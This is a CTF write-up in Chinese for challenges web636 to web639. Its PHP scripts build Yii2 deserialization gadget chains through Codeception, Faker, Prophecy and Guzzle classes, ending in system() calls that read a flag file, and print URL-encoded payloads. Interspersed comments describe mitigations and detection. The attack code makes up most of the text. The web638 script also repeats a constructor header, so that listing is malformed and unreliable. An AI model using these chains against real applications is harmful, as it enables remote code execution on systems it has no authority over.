web636
Yii2反序列化链
RunProcess->ValidGenerator
这里因为有报错信息,看不到命令执行结果,所以把结果写到其他文件再查看。
(这条链成立的前提是目标对用户可控的数据调用了 unserialize();防御上应避免反序列化不可信输入,或通过 allowed_classes 选项限制可实例化的类。)
<?php
// Stub copies of two Faker classes. They declare only properties and
// constructors, so their purpose here is to make serialize() emit objects
// with these class names and property values. Any behaviour on the receiving
// side comes from the library's own methods, which this listing does not show.
namespace Faker{
// Holds one value in the protected property `default`.
class DefaultGenerator{
protected $default;
/**
 * @param mixed $cmd value stored in `default`; ValidGenerator below passes
 *                   its own $cmd argument through to here
 */
public function __construct($cmd)
{
$this->default = $cmd;
}
}
// Pairs a DefaultGenerator with a callable name and a retry count.
class ValidGenerator
{
protected $generator;
protected $validator;
protected $maxRetries;
/**
 * @param mixed $cmd forwarded unchanged to the wrapped DefaultGenerator
 */
public function __construct($cmd){
$this->generator=new DefaultGenerator($cmd);
$this->maxRetries=1;
// `validator` is set to the name of PHP's system() function.
// NOTE(review): presumably the real ValidGenerator calls this callable on
// the value produced by `generator`; that code is not in this listing, so
// confirm against the Faker source.
// Mitigation: property values restored by unserialize() are attacker data.
// Passing ['allowed_classes' => false] (or an explicit allow-list) to
// unserialize() stops these classes from being instantiated at all.
$this->validator='system';
}
}
}
// Entry object of the chain the page names "RunProcess->ValidGenerator".
namespace Codeception\Extension{
use Faker\ValidGenerator;
// Stub of Codeception's RunProcess extension; only the private `processes`
// array is populated, with a single ValidGenerator.
// NOTE(review): presumably the real class walks `processes` during object
// teardown; that code is not shown here, so confirm against Codeception.
class RunProcess{
private $processes = [] ;
/**
 * @param mixed $cmd forwarded to the ValidGenerator stored in `processes`
 */
function __construct($cmd)
{
$this->processes[] = new ValidGenerator($cmd);
}
}
// Prints the URL-encoded serialized object graph. The command redirects its
// output to 1.txt because, per the page, the error output hides the result.
// Detection: a request parameter carrying a serialized PHP object whose class
// name belongs to a test-only package (Codeception, Faker) is a strong signal
// of a deserialization attempt. Such packages are typically dev dependencies;
// deploying with `composer install --no-dev` removes them as gadgets, though
// the actual fix is not to unserialize request data.
echo(urlencode(serialize(new RunProcess('cat /flags_c > 1.txt'))));
}
web637
上题链被过滤
参考文章
RunProcess->ObjectProphecy->LazyDouble->Doubler->ClassCreator
分析就略了。。。(因为最新版的RunProcess被过滤了👻)
<?php
/***
* Created by joker
* Date 2021/9/7 20:02
***/
// Entry object of the second chain, which the page lists as
// RunProcess->ObjectProphecy->LazyDouble->Doubler->ClassCreator.
namespace Codeception\Extension;
use Prophecy\Prophecy\ObjectProphecy;
// Stub of Codeception's RunProcess; only the private `processes` property is
// populated. No methods from the real class are reproduced here.
class RunProcess{
private $processes;
function __construct()
{
// Inner ObjectProphecy built with the string '1' as its constructor argument.
$a = new ObjectProphecy('1');
// Outer ObjectProphecy receives the inner one and is the only element
// appended to `processes`.
$this->processes[] = new ObjectProphecy($a);
}
}
// Prints the URL-encoded serialized object graph.
// Detection: serialized objects naming Codeception\ or Prophecy\ classes in a
// request are not expected in normal traffic and are worth alerting on.
echo urlencode(serialize(new RunProcess()));
namespace Prophecy\Prophecy;
use Prophecy\Doubler\LazyDouble;
// Stub of Prophecy's ObjectProphecy with two private properties and no
// methods; it exists so the serialized graph uses this class name.
class ObjectProphecy{
private $lazyDouble;
private $revealer;
/**
 * @param mixed $a stored in `revealer`; the caller in this listing passes
 *                 either '1' or another ObjectProphecy
 */
function __construct($a)
{
$this->revealer = $a;
// Every instance gets its own freshly built LazyDouble.
$this->lazyDouble = new LazyDouble();
}
}
namespace Prophecy\Doubler;
// Stub of Prophecy's LazyDouble: four private properties filled in by the
// constructor, no methods.
class LazyDouble{
private $doubler;
private $argument;
private $class;
private $interfaces;
function __construct()
{
// Next link of the chain: a Doubler stub from this same namespace.
$this->doubler =new Doubler();
// `class` and the single `interfaces` entry are both ReflectionClass
// objects for the built-in Exception class.
$this->class = new \ReflectionClass('Exception');
// One-element associative array using the author's marker string.
$this->argument = array('fallingskies'=>'fallingskies');
$this->interfaces[] = new \ReflectionClass('Exception');
}
}
namespace Prophecy\Doubler\Generator\Node;
// Empty stub: only the class name matters, since the Doubler stub in this
// listing stores an instance of it inside a DefaultGenerator.
class ClassNode{
}
namespace Prophecy\Doubler;
use Prophecy\Doubler\Generator\Node\ClassNode;
use Faker\DefaultGenerator;
use Prophecy\Doubler\Generator\ClassCreator;
// Stub of Prophecy's Doubler. Two of its three collaborators are replaced by
// Faker\DefaultGenerator objects that merely carry a fixed value.
// NOTE(review): this presumably relies on DefaultGenerator answering any
// method call with its stored value; that behaviour is not shown in this
// listing, so confirm against the Faker source.
class Doubler{
private $mirror;
private $creator;
private $namer;
function __construct()
{
// `namer` carries a marker string, `mirror` carries an empty ClassNode.
$this->namer = new DefaultGenerator('fallingskies');
$this->mirror = new DefaultGenerator(new ClassNode());
// Last link of the chain as listed on the page.
$this->creator = new ClassCreator();
}
}
namespace Faker;
// Stub of Faker's DefaultGenerator: stores one value in the protected
// property `default`. Used throughout this listing as a generic value holder.
class DefaultGenerator{
protected $default;
/**
 * @param mixed $default value kept verbatim in the `default` property
 */
function __construct($default)
{
$this->default = $default;
}
}
namespace Prophecy\Doubler\Generator;
use Faker\DefaultGenerator;
// Stub of Prophecy's ClassCreator whose `generator` is replaced by a
// DefaultGenerator holding a string of PHP source code.
class ClassCreator{
private $generator;
function __construct()
{
// The stored value is a PHP statement, not a shell command.
// NOTE(review): this presumably means the real ClassCreator evaluates the
// code its generator returns; that code is not in this listing, so confirm
// against Prophecy.
// Mitigation: a class that evaluates generated code is a dangerous gadget
// once unserialize() accepts client data. Keep mocking libraries out of
// production autoloaders and restrict unserialize() with allowed_classes.
$this->generator = new DefaultGenerator('system("cat /flags_c > 1.txt");');
}
}
web638
参考文章:https://blog.csdn.net/Mrs_H/article/details/119928348
https://www.anquanke.com/post/id/251366#h2-6
https://xz.aliyun.com/t/9948
需要先下载一个闭包依赖 Opis Closure
这条链算最复杂的一条了🤣
这里主要是用闭包函数,来解决call_user_func()只能控制第一个参数的情况。
<?php
// Entry object of the third chain. Per the page, this variant uses a closure
// because call_user_func() only lets the chain control the first argument.
namespace Codeception\Extension{
use Faker\DefaultGenerator;
use GuzzleHttp\Psr7\AppendStream;
// Stub of Codeception's RunProcess with the `output` and `processes`
// properties populated; no methods are reproduced.
class RunProcess{
protected $output;
private $processes = [];
public function __construct(){
// The single `processes` entry is a DefaultGenerator wrapping an
// AppendStream; `output` is a DefaultGenerator wrapping a marker string.
$this->processes[]=new DefaultGenerator(new AppendStream());
$this->output=new DefaultGenerator('fallingskies');
}
}
// Prints the URL-encoded serialized object graph.
// Detection: serialized objects naming Codeception\, Faker\ or GuzzleHttp\Psr7\
// classes in a request parameter are not expected in normal traffic.
echo urlencode(serialize(new RunProcess()));
}
namespace Faker{
// Stub of Faker's DefaultGenerator: a holder for one value in the protected
// property `default`.
class DefaultGenerator
{
protected $default;
/**
 * @param mixed $default value kept verbatim; null when omitted
 */
public function __construct($default = null)
{
$this->default = $default;
}
}
}
// Stubs of three Guzzle PSR-7 stream classes, nested AppendStream ->
// CachingStream -> PumpStream. Only properties and constructors are declared.
namespace GuzzleHttp\Psr7{
use Faker\DefaultGenerator;
// `streams` receives one CachingStream; `seekable` is initialised to true.
final class AppendStream{
private $streams = [];
private $seekable = true;
public function __construct(){
$this->streams[]=new CachingStream();
}
}
// `remoteStream` is a DefaultGenerator holding false; `stream` is a PumpStream.
final class CachingStream{
private $remoteStream;
public function __construct(){
$this->remoteStream=new DefaultGenerator(false);
$this->stream=new PumpStream();
}
}
// Carries the closure in `source`; `size` is initialised to -10 and `buffer`
// to a DefaultGenerator holding a marker string.
final class PumpStream{
private $source;
private $size=-10;
private $buffer;
// NOTE(review): the constructor header appears twice in the published
// listing, most likely a paste artifact.
public function __construct(){
public function __construct(){
$this->buffer=new DefaultGenerator('fallingskies');
// Loads the Opis Closure library from a local `closure/` directory.
include("closure/autoload.php");
// The closure is serialized with Opis Closure, then passed through PHP's
// unserialize(), and the resulting object is stored in `source`.
// Mitigation: a serialized closure is executable code. If an application
// ships opis/closure, any unserialize() reachable with client data can
// rebuild such closures, so restrict it with allowed_classes or replace
// the format with JSON.
$a = function(){system("cat /flags_c > 1.txt");};
$a = \Opis\Closure\serialize($a);
$b = unserialize($a);
$this->source=$b;
}
}
}
web639
同上